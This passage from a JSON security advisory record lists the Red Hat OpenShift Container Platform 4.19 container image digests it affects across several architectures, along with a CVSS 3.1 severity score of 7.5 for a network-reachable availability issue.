"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
